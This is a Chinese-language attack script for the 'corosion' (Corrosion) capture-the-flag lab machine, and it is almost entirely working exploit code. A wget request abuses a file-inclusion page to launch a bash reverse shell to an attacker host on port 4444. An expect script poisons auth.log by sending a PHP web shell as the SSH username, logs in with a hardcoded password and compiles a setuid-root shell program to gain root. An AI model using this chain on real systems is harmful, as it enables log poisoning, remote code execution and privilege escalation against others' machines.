corosion攻击脚本

 攻击脚本：

1.攻击的过程，等待访问此链接

wget -q -O /dev/null "http://192.168.253.131/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=%2fbin%2fbash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.253.132%2f4444+0%3e%261%22"

 

2.攻击脚本

#!/usr/bin/expect

# 设置超时时间
set timeout 40

proc wait_command {} {
# 等待2秒
    sleep 2
    # 接收命令输出并打印
    expect {
        -re "(.*)\r\n" {
          #  puts "命令输出：$expect_out(0,string)"
        }
    }
    
}

# 设置SSH连接的用户名、主机名和密码
set username "\'<?php system(\$_REQUEST\[\'cmd\'\]);?>\'"
set hostname "192.168.253.131"
set password "your_password"

# 执行SSH连接
spawn ssh $username@$hostname
expect "assword:"
send "$password\r"
expect "lease try again"

wait_command

# Ctrl+C
send "\x03"
# 等待退出完成
expect eof



# 执行nc监听
spawn nc -lvnp 4444
expect "listening on"



expect {
    "connect" {
        # 当接收到nc连接成功的消息时，打印提示信息
        puts "nc连接成功，发送命令..."
        # 发送命令给服务端的反弹shell
        send "whoami\n"
    }
    timeout {
        # 超时处理
        send_user "超时，未成功建立nc连接。\n"
        exit 1
    }
}

# 接收命令输出并打印
wait_command

send "cat passwd.txt\n"
# 接收命令输出并打印
wait_command

send "\x03"
# 等待退出完成
expect eof


# 设置SSH连接的用户名、主机名和密码
set username "randy"
set hostname "192.168.253.131"
set password "randylovesgoldfish1998"

# 执行SSH连接
spawn ssh $username@$hostname
expect "assword:"
send "$password\r"
wait_command

send "sudo -l\n"
expect "assword"
send "$password\r"
sleep 3
# 发现/home/randy/tools/easysysinfo可执行，编译提权脚本
send "cd /home/randy/tools/\n"

set file_content {
#include <unistd.h>
#include <stdlib.h>

int main(){
    setuid(0);
    setgid(0);
    system("bash -i");
    return 0;
}
}

set file_path "/home/randy/tools/easysysinfo.c"

# 创建并写入文件
send "echo '$file_content' > $file_path\r"


send "gcc  easysysinfo.c -o easysysinfo\n"

expect -re "(.*)\r\n"
send "chmod 700 easysysinfo\n"
expect -re "(.*)\r\n"
# 提权执行
send "sudo ./easysysinfo\n"
expect -re "(.*)\r\n"

send "touch backdoor.sh\n"
expect -re "(.*)\r\n"
send "ls -l\n"
expect -re "(.*)\r\n"
# 结束连接
send "exit\n"
send "exit\n"
expect eof